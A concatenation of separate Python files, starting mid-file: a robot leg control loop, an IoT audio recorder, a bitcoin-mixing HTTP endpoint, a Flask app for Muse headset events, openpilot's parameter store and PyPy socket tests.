AH = min((L4**2-L3**2+AC**2)/(2*AC),L4)
HD = math.sqrt(L4**2-AH**2)
xH = xA+AH*(xC-xA)/AC
yH = yA+AH*(yC-yA)/AC
xD = xH-HD*(yC-yA)/AC
yD = yH+HD*(xC-xA)/AC
xF = xC+L5*(xC-xD)/L3
yF = yC+L5*(yC-yD)/L3
return math.atan((yF-yC)/(xF-xC))*180.0/math.pi, math.atan(yF/xF)*180.0/math.pi
lapin = pypot.robot.from_json('confLapinMarkII.json')
PS = Serial('/dev/ttyAMA0',115200,timeout=0.1)
PS.flushInput()
info = {}
alpha = 0 # positif quand on ecarte
theta = 0 # negatif vers l'avant
aLc = 0 # repos à -40, extension à 30
aRc = 0 # repos à -40, extension à 30
compliant = True
speed = 100
state = 0
xLeft=0
xRight=0
KP = 10
KI = 5
rythme=1
srythme=10
inputQueue = queue.Queue()
inputThread = threading.Thread(target=read_kbd_input, args=(inputQueue,), daemon=True)
inputThread.start()
count = 0
last_update = time.time()
t0 = time.time()
while True:
if (inputQueue.qsize() > 0):
c = inputQueue.get()
if c=='q':
break
if c=='a':
state = -1
# mesures
# mesure de la temperature
temp = 0
for mot in lapin.motors:
temp = max(temp, mot.present_temperature)
if temp >60:
print("HOT!")
# mesure de l'angle quadrilatere
aLm = interpInv(lapin.l_knee_y.present_position, -40, 30)
aRm = interpInv(lapin.r_knee_y.present_position, -40, 30)
# recuperation des capteurs
PS.write(b"A")
out = PS.readline()
try:
info = json.loads(out)
except:
pass
print(str(temp)+'°C\t'+str(state))
print(lapin.l_ankle_y.present_position)
if info["RF"]["F"]+info["RB"]["F"]+info["LF"]["F"]+info["LB"]["F"]>40:
rbalance = (info["RF"]["F"]+info["RB"]["F"])/(info["RF"]["F"]+info["RB"]["F"]+info["LF"]["F"]+info["LB"]["F"])
else:
rbalance=0.5
roll = info["GYR"]["X"]
print("rbalance: "+str(rbalance))
print(info["GYR"])
# machine a etat
if state == 0:
alpha = 10
theta = 0
aLc = 0.9
aRc = 0.9
speed = 10
compliant = False
if time.time()-t0 > 10:
t0 = time.time()
state = 1
elif state == 1:
alpha = 10
theta = 0
aLc = 0.9
aRc = 0.8
speed = 3
compliant = False
if time.time()-t0 > 10:
t0 = time.time()
state = 2
elif state == 2:
alpha = 10
theta = 0
aLc = 0.5
aRc = 0.8
speed = 100
compliant = False
if time.time()-t0 > 5:
t0 = time.time()
state = 0
elif state == -1:
alpha = 0
theta = 0
aLc = 0.5
aRc = 0.5
speed = 10
compliant = True
# actionneurs
(aFr,lFr) = MGD((70-lapin.r_knee_y.present_position)*math.pi/180.0)
(aFl,lFl) = MGD((70-lapin.l_knee_y.present_position)*math.pi/180.0)
lapin.r_hip_x.pid = (KP,KI,0)
lapin.r_hip_x.compliant = compliant
lapin.r_hip_x.goal_position = alpha/2
lapin.r_hip_x.moving_speed = speed
lapin.l_hip_x.pid = (KP,KI,0)
lapin.l_hip_x.compliant = compliant
lapin.l_hip_x.goal_position = alpha/2
lapin.l_hip_x.moving_speed = speed
lapin.r_hip_y.compliant = compliant
lapin.r_hip_y.goal_position = -lFr-theta/2
lapin.r_hip_y.moving_speed = 0
lapin.l_hip_y.compliant = compliant
lapin.l_hip_y.goal_position = -lFl+theta/2
lapin.l_hip_y.moving_speed = speed
lapin.r_knee_y.pid = (KP,KI,0)
lapin.r_knee_y.compliant = compliant
lapin.r_knee_y.goal_position = interp(aRc, -40, 30)
lapin.r_knee_y.moving_speed = speed
lapin.l_knee_y.pid = (KP,KI,0)
lapin.l_knee_y.compliant = compliant
lapin.l_knee_y.goal_position = interp(aLc, -40, 30)
lapin.l_knee_y.moving_speed = speed
lapin.r_ankle_y.compliant = compliant
lapin.r_ankle_y.goal_position = aFr-lFr-0
lapin.r_ankle_y.moving_speed = speed
lapin.l_ankle_y.compliant = compliant
lapin.l_ankle_y.goal_position = aFl-lFl-0
lapin.l_ankle_y.moving_speed = speed
time.sleep(0.005)
for mot in lapin.motors:
mot.compliant = True
time.sleep(0.04)
lapin.close()
|
audio_service.py
|
import os
import re
import time
import wave
import commons
import pyaudio
import multiprocessing
import network_service as nS
def search_device():
pa = pyaudio.PyAudio()
audio_device = None
# for i in range(0, pa.get_device_count()):
# print(pa.get_device_info_by_index(i))
for i in range(0, pa.get_device_count()):
deviceName = pa.get_device_info_by_index(i)['name']
deviceInputChannels = pa.get_device_info_by_index(i)['maxInputChannels']
isUSBDevice = re.search(".USB.", str(deviceName)) #regex
isUSBDevice = isUSBDevice or re.search("USB.", str(deviceName)) #regex
if isUSBDevice and deviceInputChannels != 0:
print("[INFO] The index of USB Audio Device is ", i)
print("[INFO] Device's information: ", pa.get_device_info_by_index(i))
audio_device = i
break
if audio_device is None:
print("[ERROR] The USB sound card is missing")
return None
isSupported = pa.is_format_supported(rate=commons.rate,
input_device=audio_device,
input_channels=commons.channels,
input_format=commons.format)
if isSupported:
print("[INFO] The device support recording.")
return audio_device
else:
print("[INFO] The device does not support recording.")
return None
def aduio_service(audio_device, serial_dict, sock, sock_lock):
recordProcess = multiprocessing.Process(target=record_audio, args=(audio_device, serial_dict, sock, sock_lock))
if __name__ == '__main__':
recordProcess.start()
else:
return recordProcess
def record_audio(audio_device, serial_dict, sock, sock_lock):
pa = pyaudio.PyAudio()
stream = pa.open(rate=commons.rate,
channels=commons.channels,
format=commons.format,
input=True,
input_device_index=audio_device,
frames_per_buffer=commons.chunk)
print("[INFO] Aduio device open success.Begin to record.")
while True:
print("[INFO] Audio recording.")
file_name = time.strftime("%Y%m%d%H%M%S", time.localtime()) + ".wav"
file_path = commons.cache + file_name
shell = 'arecord -D "plughw:1,0" -t wav -c 1 -f S16_LE -r 48000 -d 5 '
shell += file_path
print(os.popen(shell))
# frames = []
# for i in range(0, int(commons.rate / commons.chunk * commons.rec_seconds)):
# data = stream.read(commons.chunk, exception_on_overflow=False)
# frames.append(data)
print("[INFO] Recording end.")
# stream.stop_stream()
# stream.close()
# pa.terminate()
# wf = wave.open(file_path, 'wb')
# wf.setnchannels(commons.channels)
# wf.setsampwidth(pa.get_sample_size(commons.format))
# wf.setframerate(commons.rate)
# wf.writeframes(b''.join(frames))
# wf.close()
# Send audio to server
print("[INFO] Send audio to server.")
json_msg = {
"Action": "Audio",
"ID": file_name[0:14],
"From": "IOT",
"Lng": str(serial_dict['LNG'] / 1000000),
"Lat": str(serial_dict['LAT'] / 1000000),
"Heart": str(serial_dict['RATE']),
"File": file_name
}
sock_lock.acquire()
nS.send_msg(sock, json_msg)
sock_lock.release()
os.remove(file_path)
|
server.py
|
# server.py
# Run http server for bitcoin mixing service
#
# HingOn Miu
# https://docs.python.org/3/library/http.server.html
import io
import random
import string
import json
import time
import socket
import threading
from socketserver import ThreadingMixIn
from http.server import HTTPServer, BaseHTTPRequestHandler
from urllib.parse import urlparse
import mixing_service
# sample http GET url for bitcoin mixing request
# http://127.0.0.1:9000/api?destination_amount=123&destination_address=ABCDEFG&refund_address=ABCDEFG
# api endpoint following base url
API_endpoint = "/api"
class Handler(BaseHTTPRequestHandler):
# handle http GET requests
def do_GET(self):
print("GET: " + self.path)
# url parameters
parameters = {
"destination_amount": 0, # exact bitcoin amount to be deposited after mixing
"destination_address": 0, # bitcoin address to deposit destination_amount
"refund_address": 0 } # refund bitcoin address if mixing service goes wrong
# parse url path
parsed_path = urlparse(self.path)
# check if API endpoint
if parsed_path.path != API_endpoint:
self.send_error(404)
return
# parse query
query = parsed_path.query.split("&")
# check each query
for q in query:
# check if format is "A=B"
kv = q.split("=")
if len(kv) != 2:
self.send_error(400)
return
k, v = kv
#print(k)
#print(v)
# check if query is a valid parameter
if k not in parameters:
self.send_error(400)
return
# store value to parameter
parameters[k] = v
# check if any parameter is missing
for v in parameters.values():
if v == 0:
self.send_error(400)
return
destination_amount = parameters["destination_amount"]
destination_address = parameters["destination_address"]
refund_address = parameters["refund_address"]
# check if bitcoin amount is float
try:
float(destination_amount)
except ValueError:
self.send_error(400)
return
# check bitcoin address format
if (len(destination_address) < 26 or len(destination_address) > 35 or
len(refund_address) < 26 or len(refund_address) > 35):
self.send_error(400)
return
print("destination_amount: " + destination_amount)
print("destination_address: " + destination_address)
print("refund_address: " + refund_address)
# create mixing service that eventually send destination_amount to destination_address
# user should first pay service_bill to service_address for mixing service to begin
service_bill, service_address = \
mixing_service.create_service(float(destination_amount), destination_address, refund_address)
self.send_response(200)
self.send_header("Content-Type", "text/plain; charset=utf-8")
self.end_headers()
# request bitcoin amount cannot be handled
if service_bill == 0.0:
message = json.dumps({"error": "destination_amount exceeds service maximum limit"})
else:
message = json.dumps({"deposit_amount": service_bill, "deposit_address": service_address})
self.wfile.write(message.encode('utf-8'))
self.wfile.write(b'\n')
class ThreadedHTTPServer(ThreadingMixIn, HTTPServer):
pass
if __name__ == "__main__":
HOST, PORT = "localhost", 9000
# create server
server = ThreadedHTTPServer((HOST, PORT), Handler)
# start server thread to handle requests and server thread starts new thread for each new request
server_thread = threading.Thread(target=server.serve_forever)
server_thread.daemon = True
server_thread.start()
print("Server thread ready to handle http requests...")
# run main loop of mixing service to monitor all mixing orders
mixing_service.loop_service()
# clean up server
server.shutdown()
server.server_close()
|
main.py
|
# coding: UTF-8
import sys
import time
import itertools
import json
import numpy as np
from numpy.fft import fft
from collections import deque
import threading as th
import flask as fl
from flask import Flask, render_template, request, Response, redirect, url_for
from server import MuseServer
from search_yt_by_word import Search
from detect_movement import pravila
app = Flask(__name__)
calculatedBeat = 0
mainLock = th.RLock()
search = Search()
currentSong = ""
yt_id = ""
itunes_link = ""
acc_data_num = 0
dq = deque()
headLock = th.RLock()
stopserve = False
stopserveLock = th.Lock()
def serve():
global calculatedBeat, currentSong, yt_id, itunes_link, stopserve
print("Starting server!!!")
t = 5
# time.sleep(t)
while 1:
stopserveLock.acquire()
if stopserve:
stopserve = False
stopserveLock.release()
print("Returning server1")
return
stopserveLock.release()
acc_data_num = 0
for i in range(10):
stopserveLock.acquire()
if stopserve:
stopserve = False
stopserveLock.release()
print("Returning server2")
return
stopserveLock.release()
server.acc_lock.acquire()
tmp = list(zip(*server.acc_list))
raw_tmp = tmp[:]
server.acc_lock.release()
n2 = len(tmp)
tmp = tmp[acc_data_num:]
acc_data_num = n2
podatki = pravila(raw_tmp, duration=t/10)
headLock.acquire()
if "ndesno" in podatki:
dq.append("ndesno")
headLock.release()
time.sleep(t / 10.0)
server.acc_lock.acquire()
tmp = list(zip(*server.acc_list))
server.acc_list = []
server.acc_lock.release()
if tmp and tmp[0]:
size = len(tmp[0])
fs = [i / t for i in range(size // 2)]
tmp = [np.array(x) - sum(x) / len(x) for x in tmp]
acc_fft = [fft(x)[: size // 2] for x in tmp]
imax = [sorted(enumerate(x), key=lambda k: abs(k[1]))[-1] for x in acc_fft]
print(fs[imax[0][0]], fs[imax[0][0]] * 60)
mainLock.acquire()
calculatedBeat = fs[imax[0][0]] * 60
local_beat = calculatedBeat
mainLock.release()
search_result = search.search_all(local_beat)
mainLock.acquire()
currentSong, yt_id, itunes_link = search_result
mainLock.release()
ser = th.Thread(target=serve)
@app.route('/restart')
def restart():
print("restarting serve")
global calculatedBeat, yt_id, ser, stopserve, server
mainLock.acquire()
calculatedBeat = 0
yt_id = ""
search.clear()
mainLock.release()
server.acc_lock.acquire()
server.acc_list = []
server.acc_lock.release()
stopserveLock.acquire()
stopserve = True
stopserveLock.release()
while True:
stopserveLock.acquire()
local = stopserve
stopserveLock.release()
if not local:
ser = th.Thread(target=serve)
ser.start()
break
return "100"
@app.route('/getnext')
def getnext():
print("bpm")
bpm = int(request.args.get("bpm", 80))
print("bpm2")
try:
search_result = search.search_all(bpm)
except Exception as e:
print(e)
print(search_result)
song, yt, itunes = search_result
return "{\"bpm\": %d, \"song\": \"%s\", \"yt_id\": \"%s\", " \
"\"itunes_link\": \"%s\"}\n\n" % (bpm, song, yt, itunes)
@app.route('/')
def index():
global calculatedBeat, yt_id
mainLock.acquire()
calculatedBeat = 0
yt_id = ""
search.clear()
mainLock.release()
return render_template('index.html')
@app.route('/status')
def status():
def events():
while 1:
server.senstate_lock.acquire()
event = server.senstate
server.senstate_lock.release()
if event:
yield "event: status\ndata: %s\n\n" % (json.dumps(event))
time.sleep(0.2) # an artificial delay
return Response(events(), content_type='text/event-stream')
@app.route('/headswipe')
def headswipe():
def events():
while 1:
headLock.acquire()
event = len(dq) and dq.pop()
dq.clear()
headLock.release()
if event != 0:
print("head")
yield "event: head\ndata: %s\n\n" % (event)
time.sleep(0.1) # an artificial delay
return Response(events(), content_type='text/event-stream')
@app.route('/blink')
def blink():
def events():
while 1:
server.blink_lock.acquire()
event = len(server.blink_list) and server.blink_list.pop()
server.blink_lock.release()
if event != 0:
yield "event: blink\ndata: %s\n\n" % (event)
time.sleep(0.05) # an artificial delay
return Response(events(), content_type='text/event-stream')
@app.route('/jaw')
def jaw():
def events():
while 1:
server.jaw_lock.acquire()
event = len(server.jaw_list) and server.jaw_list.pop()
server.jaw_lock.release()
if event != 0:
yield "event: jawclench\ndata: %s\n\n" % (event)
time.sleep(0.05) # an artificial delay
return Response(events(), content_type='text/event-stream')
@app.route('/bpm')
def bpm():
def events():
while 1:
mainLock.acquire()
tmpCalculatedBeat = calculatedBeat
mainLock.release()
if tmpCalculatedBeat != 0 and yt_id != "" and currentSong != "":
yield "event: calculated\ndata: {\"bpm\": %d, \"song\": \"%s\", \"yt_id\": \"%s\", \"itunes_link\": \"%s\"}\n\n" % (tmpCalculatedBeat, currentSong, yt_id, itunes_link)
server.acc_lock.acquire()
tmpMove = 0
if server.acc_list and server.acc_list[-1]:
tmpMove = server.acc_list[-1][0]
server.acc_lock.release()
if tmpMove != 0:
yield "event: move\ndata: %d\n\n" % (tmpMove)
#yield "event: test\ndata: %d\n\n" % (calculatedBeat)
time.sleep(0.02) # an artificial delay
return Response(events(), content_type='text/event-stream')
if __name__ == '__main__':
server = MuseServer()
server.start()
ser.start()
print("Starting local server")
# serve()
app.run("0.0.0.0", port=8080, threaded=True)
|
params.py
|
#!/usr/bin/env python3
"""ROS has a parameter server, we have files.
The parameter store is a persistent key value store, implemented as a directory with a writer lock.
On Android, we store params under params_dir = /data/params. The writer lock is a file
"<params_dir>/.lock" taken using flock(), and data is stored in a directory symlinked to by
"<params_dir>/d".
Each key, value pair is stored as a file with named <key> with contents <value>, located in
<params_dir>/d/<key>
Readers of a single key can just open("<params_dir>/d/<key>") and read the file contents.
Readers who want a consistent snapshot of multiple keys should take the lock.
Writers should take the lock before modifying anything. Writers should also leave the DB in a
consistent state after a crash. The implementation below does this by copying all params to a temp
directory <params_dir>/<tmp>, then atomically symlinking <params_dir>/<d> to <params_dir>/<tmp>
before deleting the old <params_dir>/<d> directory.
Writers that only modify a single key can simply take the lock, then swap the corresponding value
file in place without messing with <params_dir>/d.
"""
import time
import os
import errno
import shutil
import fcntl
import tempfile
import threading
from enum import Enum
from common.basedir import PARAMS
def mkdirs_exists_ok(path):
try:
os.makedirs(path)
except OSError:
if not os.path.isdir(path):
raise
class TxType(Enum):
PERSISTENT = 1
CLEAR_ON_MANAGER_START = 2
CLEAR_ON_PANDA_DISCONNECT = 3
class UnknownKeyName(Exception):
pass
keys = {
"AccessToken": [TxType.CLEAR_ON_MANAGER_START],
"AthenadPid": [TxType.PERSISTENT],
"CalibrationParams": [TxType.PERSISTENT],
"CarParams": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"CarParamsCache": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"CarVin": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"CommunityFeaturesToggle": [TxType.PERSISTENT],
"CompletedTrainingVersion": [TxType.PERSISTENT],
"ControlsParams": [TxType.PERSISTENT],
"DisablePowerDown": [TxType.PERSISTENT],
"DoUninstall": [TxType.CLEAR_ON_MANAGER_START],
"DongleId": [TxType.PERSISTENT],
"GitBranch": [TxType.PERSISTENT],
"GitCommit": [TxType.PERSISTENT],
"GitRemote": [TxType.PERSISTENT],
"GithubSshKeys": [TxType.PERSISTENT],
"HasAcceptedTerms": [TxType.PERSISTENT],
"HasCompletedSetup": [TxType.PERSISTENT],
"IsDriverViewEnabled": [TxType.CLEAR_ON_MANAGER_START],
"IsLdwEnabled": [TxType.PERSISTENT],
"IsGeofenceEnabled": [TxType.PERSISTENT],
"IsMetric": [TxType.PERSISTENT],
"IsOffroad": [TxType.CLEAR_ON_MANAGER_START],
"IsRHD": [TxType.PERSISTENT],
"IsTakingSnapshot": [TxType.CLEAR_ON_MANAGER_START],
"IsUpdateAvailable": [TxType.CLEAR_ON_MANAGER_START],
"IsUploadRawEnabled": [TxType.PERSISTENT],
"LastAthenaPingTime": [TxType.PERSISTENT],
"LastUpdateTime": [TxType.PERSISTENT],
"LimitSetSpeed": [TxType.PERSISTENT],
"LimitSetSpeedNeural": [TxType.PERSISTENT],
"LiveParameters": [TxType.PERSISTENT],
"LongitudinalControl": [TxType.PERSISTENT],
"OpenpilotEnabledToggle": [TxType.PERSISTENT],
"LaneChangeEnabled": [TxType.PERSISTENT],
"PandaFirmware": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"PandaFirmwareHex": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"PandaDongleId": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"Passive": [TxType.PERSISTENT],
"RecordFront": [TxType.PERSISTENT],
"ReleaseNotes": [TxType.PERSISTENT],
"ShouldDoUpdate": [TxType.CLEAR_ON_MANAGER_START],
"SpeedLimitOffset": [TxType.PERSISTENT],
"SubscriberInfo": [TxType.PERSISTENT],
"TermsVersion": [TxType.PERSISTENT],
"TrainingVersion": [TxType.PERSISTENT],
"UpdateAvailable": [TxType.CLEAR_ON_MANAGER_START],
"UpdateFailedCount": [TxType.CLEAR_ON_MANAGER_START],
"Version": [TxType.PERSISTENT],
"Offroad_ChargeDisabled": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"Offroad_ConnectivityNeeded": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_ConnectivityNeededPrompt": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_TemperatureTooHigh": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_PandaFirmwareMismatch": [TxType.CLEAR_ON_MANAGER_START, TxType.CLEAR_ON_PANDA_DISCONNECT],
"Offroad_InvalidTime": [TxType.CLEAR_ON_MANAGER_START],
"Offroad_IsTakingSnapshot": [TxType.CLEAR_ON_MANAGER_START],
}
def fsync_dir(path):
fd = os.open(path, os.O_RDONLY)
try:
os.fsync(fd)
finally:
os.close(fd)
class FileLock():
def __init__(self, path, create):
self._path = path
self._create = create
self._fd = None
def acquire(self):
self._fd = os.open(self._path, os.O_CREAT if self._create else 0)
fcntl.flock(self._fd, fcntl.LOCK_EX)
def release(self):
if self._fd is not None:
os.close(self._fd)
self._fd = None
class DBAccessor():
def __init__(self, path):
self._path = path
self._vals = None
def keys(self):
self._check_entered()
return self._vals.keys()
def get(self, key):
self._check_entered()
if self._vals is None:
return None
try:
return self._vals[key]
except KeyError:
return None
def _get_lock(self, create):
lock = FileLock(os.path.join(self._path, ".lock"), create)
lock.acquire()
return lock
def _read_values_locked(self):
"""Callers should hold a lock while calling this method."""
vals = {}
try:
data_path = self._data_path()
keys = os.listdir(data_path)
for key in keys:
with open(os.path.join(data_path, key), "rb") as f:
vals[key] = f.read()
except (OSError, IOError) as e:
# Either the DB hasn't been created yet, or somebody wrote a bug and left the DB in an
# inconsistent state. Either way, return empty.
if e.errno == errno.ENOENT:
return {}
return vals
def _data_path(self):
return os.path.join(self._path, "d")
def _check_entered(self):
if self._vals is None:
raise Exception("Must call __enter__ before using DB")
class DBReader(DBAccessor):
def __enter__(self):
try:
lock = self._get_lock(False)
except OSError as e:
# Do not create lock if it does not exist.
if e.errno == errno.ENOENT:
self._vals = {}
return self
try:
# Read everything.
self._vals = self._read_values_locked()
return self
finally:
lock.release()
def __exit__(self, exc_type, exc_value, traceback):
pass
class DBWriter(DBAccessor):
def __init__(self, path):
super(DBWriter, self).__init__(path)
self._lock = None
self._prev_umask = None
def put(self, key, value):
self._vals[key] = value
def delete(self, key):
self._vals.pop(key, None)
def __enter__(self):
mkdirs_exists_ok(self._path)
# Make sure we can write and that permissions are correct.
self._prev_umask = os.umask(0)
try:
os.chmod(self._path, 0o777)
self._lock = self._get_lock(True)
self._vals = self._read_values_locked()
except Exception:
os.umask(self._prev_umask)
self._prev_umask = None
raise
return self
def __exit__(self, exc_type, exc_value, traceback):
self._check_entered()
try:
# data_path refers to the externally used path to the params. It is a symlink.
# old_data_path is the path currently pointed to by data_path.
# tempdir_path is a path where the new params will go, which the new data path will point to.
# new_data_path is a temporary symlink that will atomically overwrite data_path.
#
# The current situation is:
# data_path -> old_data_path
# We're going to write params data to tempdir_path
# tempdir_path -> params data
# Then point new_data_path to tempdir_path
# new_data_path -> tempdir_path
# Then atomically overwrite data_path with new_data_path
# data_path -> tempdir_path
old_data_path = None
new_data_path = None
tempdir_path = tempfile.mkdtemp(prefix=".tmp", dir=self._path)
try:
# Write back all keys.
os.chmod(tempdir_path, 0o777)
for k, v in self._vals.items():
with open(os.path.join(tempdir_path, k), "wb") as f:
f.write(v)
f.flush()
os.fsync(f.fileno())
fsync_dir(tempdir_path)
data_path = self._data_path()
try:
old_data_path = os.path.join(self._path, os.readlink(data_path))
except (OSError, IOError):
# NOTE(mgraczyk): If other DB implementations have bugs, this could cause
# copies to be left behind, but we still want to overwrite.
pass
new_data_path = "{}.link".format(tempdir_path)
os.symlink(os.path.basename(tempdir_path), new_data_path)
os.rename(new_data_path, data_path)
fsync_dir(self._path)
finally:
# If the rename worked, we can delete the old data. Otherwise delete the new one.
success = new_data_path is not None and os.path.exists(data_path) and (
os.readlink(data_path) == os.path.basename(tempdir_path))
if success:
if old_data_path is not None:
shutil.rmtree(old_data_path)
else:
shutil.rmtree(tempdir_path)
# Regardless of what happened above, there should be no link at new_data_path.
if new_data_path is not None and os.path.islink(new_data_path):
os.remove(new_data_path)
finally:
os.umask(self._prev_umask)
self._prev_umask = None
# Always release the lock.
self._lock.release()
self._lock = None
def read_db(params_path, key):
path = "%s/d/%s" % (params_path, key)
try:
with open(path, "rb") as f:
return f.read()
except IOError:
return None
def write_db(params_path, key, value):
if isinstance(value, str):
value = value.encode('utf8')
prev_umask = os.umask(0)
lock = FileLock(params_path + "/.lock", True)
lock.acquire()
try:
tmp_path = tempfile.mktemp(prefix=".tmp", dir=params_path)
with open(tmp_path, "wb") as f:
f.write(value)
f.flush()
os.fsync(f.fileno())
path = "%s/d/%s" % (params_path, key)
os.rename(tmp_path, path)
fsync_dir(os.path.dirname(path))
finally:
os.umask(prev_umask)
lock.release()
class Params():
def __init__(self, db=PARAMS):
self.db = db
# create the database if it doesn't exist...
if not os.path.exists(self.db + "/d"):
with self.transaction(write=True):
pass
def clear_all(self):
shutil.rmtree(self.db, ignore_errors=True)
with self.transaction(write=True):
pass
def transaction(self, write=False):
if write:
return DBWriter(self.db)
else:
return DBReader(self.db)
def _clear_keys_with_type(self, tx_type):
with self.transaction(write=True) as txn:
for key in keys:
if tx_type in keys[key]:
txn.delete(key)
def manager_start(self):
self._clear_keys_with_type(TxType.CLEAR_ON_MANAGER_START)
def panda_disconnect(self):
self._clear_keys_with_type(TxType.CLEAR_ON_PANDA_DISCONNECT)
def delete(self, key):
with self.transaction(write=True) as txn:
txn.delete(key)
def get(self, key, block=False, encoding=None):
if key not in keys:
raise UnknownKeyName(key)
while 1:
ret = read_db(self.db, key)
if not block or ret is not None:
break
# is polling really the best we can do?
time.sleep(0.05)
if ret is not None and encoding is not None:
ret = ret.decode(encoding)
return ret
def put(self, key, dat):
"""
Warning: This function blocks until the param is written to disk!
In very rare cases this can take over a second, and your code will hang.
Use the put_nonblocking helper function in time sensitive code, but
in general try to avoid writing params as much as possible.
"""
if key not in keys:
raise UnknownKeyName(key)
write_db(self.db, key, dat)
def put_nonblocking(key, val):
def f(key, val):
params = Params()
params.put(key, val)
t = threading.Thread(target=f, args=(key, val))
t.start()
return t
|
test_rsocket.py
|
import py, errno, sys
from rpython.rlib import rsocket
from rpython.rlib.rsocket import *
import socket as cpy_socket
from rpython.translator.c.test.test_genc import compile
def setup_module(mod):
rsocket_startup()
def test_ipv4_addr():
a = INETAddress("localhost", 4000)
assert a.get_host() == "127.0.0.1"
assert a.get_port() == 4000
a = INETAddress("", 4001)
assert a.get_host() == "0.0.0.0"
assert a.get_port() == 4001
a = INETAddress("<broadcast>", 47002)
assert a.get_host() == "255.255.255.255"
assert a.get_port() == 47002
py.test.raises(GAIError, INETAddress, "no such host exists", 47003)
res = repr(a)
assert res == "<INETAddress 255.255.255.255:47002>"
def test_unix_addr():
if getattr(rsocket, 'AF_UNIX', None) is None:
py.test.skip('AF_UNIX not supported.')
a = UNIXAddress("/tmp/socketname")
assert a.get_path() == "/tmp/socketname"
def test_netlink_addr():
if getattr(rsocket, 'AF_NETLINK', None) is None:
py.test.skip('AF_NETLINK not supported.')
pid = 1
group_mask = 64 + 32
a = NETLINKAddress(pid, group_mask)
assert a.get_pid() == pid
assert a.get_groups() == group_mask
def test_gethostname():
s = gethostname()
assert isinstance(s, str)
def test_gethostbyname():
for host in ["localhost", "127.0.0.1"]:
a = gethostbyname(host)
assert isinstance(a, INETAddress)
assert a.get_host() == "127.0.0.1"
def test_gethostbyname_ex():
for host in ["localhost", "127.0.0.1"]:
name, aliases, address_list = gethostbyname_ex(host)
allnames = [name] + aliases
for n in allnames:
assert isinstance(n, str)
if sys.platform != 'win32':
assert host in allnames
for a in address_list:
if isinstance(a, INETAddress) and a.get_host() == "127.0.0.1":
break # ok
# no IPV6, should always return IPV4
else:
py.test.fail("could not find the localhost address in %r"
% (address_list,))
def test_gethostbyaddr():
try:
cpy_socket.gethostbyaddr("::1")
except cpy_socket.herror:
ipv6 = HSocketError
except cpy_socket.gaierror:
ipv6 = GAIError
else:
ipv6 = None
for host in ["localhost", "127.0.0.1", "::1"]:
if host == "::1" and ipv6:
with py.test.raises(ipv6):
gethostbyaddr(host)
continue
name, aliases, address_list = gethostbyaddr(host)
allnames = [name] + aliases
for n in allnames:
assert isinstance(n, str)
if sys.platform != 'win32':
assert 'localhost' in allnames or 'ip6-localhost' in allnames
for a in address_list:
if isinstance(a, INETAddress) and a.get_host() == "127.0.0.1":
break # ok
if host != '127.0.0.1': # name lookup might return IPV6
if isinstance(a, INET6Address) and a.get_host() == "::1":
break # ok
else:
py.test.fail("could not find the localhost address in %r"
% (address_list,))
def test_getservbyname():
assert getservbyname('http') == 80
assert getservbyname('http', 'tcp') == 80
def test_getservbyport():
assert getservbyport(80) == cpy_socket.getservbyport(80)
assert getservbyport(80, 'tcp') == cpy_socket.getservbyport(80)
def test_getprotobyname():
assert getprotobyname('tcp') == IPPROTO_TCP
assert getprotobyname('udp') == IPPROTO_UDP
def test_socketpair():
if sys.platform == "win32":
py.test.skip('No socketpair on Windows')
s1, s2 = socketpair()
s1.sendall('?')
buf = s2.recv(100)
assert buf == '?'
count = s2.send('x'*99)
assert 1 <= count <= 99
buf = s1.recv(100)
assert buf == 'x'*count
s1.close()
s2.close()
def test_socketpair_recvinto():
class Buffer:
def setslice(self, start, string):
self.x = string
def as_str(self):
return self.x
if sys.platform == "win32":
py.test.skip('No socketpair on Windows')
s1, s2 = socketpair()
buf = Buffer()
s1.sendall('?')
s2.recvinto(buf, 1)
assert buf.as_str() == '?'
count = s2.send('x'*99)
assert 1 <= count <= 99
s1.recvinto(buf, 100)
assert buf.as_str() == 'x'*count
s1.close()
s2.close()
def test_simple_tcp():
from rpython.rlib import rthread
sock = RSocket()
try_ports = [1023] + range(20000, 30000, 437)
for port in try_ports:
print 'binding to port %d:' % (port,),
try:
sock.bind(INETAddress('127.0.0.1', port))
print 'works'
break
except SocketError as e: # should get a "Permission denied"
print e
else:
raise e
addr = INETAddress('127.0.0.1', port)
assert addr.eq(sock.getsockname())
sock.listen(1)
s2 = RSocket(AF_INET, SOCK_STREAM)
s2.settimeout(10.0) # test one side with timeouts so select is used, shouldn't affect test
connected = [False] #thread-mutable list
def connecting():
try:
s2.connect(addr)
connected[0] = True
finally:
lock.release()
lock = rthread.allocate_lock()
lock.acquire(True)
rthread.start_new_thread(connecting, ())
print 'waiting for connection'
fd1, addr2 = sock.accept()
s1 = RSocket(fd=fd1)
print 'connection accepted'
lock.acquire(True)
assert connected[0]
print 'connecting side knows that the connection was accepted too'
assert addr.eq(s2.getpeername())
#assert addr2.eq(s2.getsockname())
assert addr2.eq(s1.getpeername())
s1.send('?')
print 'sent one character'
buf = s2.recv(100)
assert buf == '?'
print 'received ok'
def sendstuff():
s2.sendall('x'*50000)
rthread.start_new_thread(sendstuff, ())
buf = ''
while len(buf) < 50000:
data = s1.recv(50100)
print 'recv returned %d bytes' % (len(data,))
assert data
buf += data
assert buf == 'x'*50000
print 'data received ok'
s1.shutdown(SHUT_RDWR)
s1.close()
s2.close()
def test_simple_udp():
s1 = RSocket(AF_INET, SOCK_DGRAM)
try_ports = [1023] + range(20000, 30000, 437)
for port in try_ports:
print 'binding to port %d:' % (port,),
try:
s1.bind(INETAddress('127.0.0.1', port))
print 'works'
break
except SocketError as e: # should get a "Permission denied"
print e
else:
raise e
addr = INETAddress('127.0.0.1', port)
assert addr.eq(s1.getsockname())
s2 = RSocket(AF_INET, SOCK_DGRAM)
s2.settimeout(10.0) # test one side with timeouts so select is used, shouldn't affect test
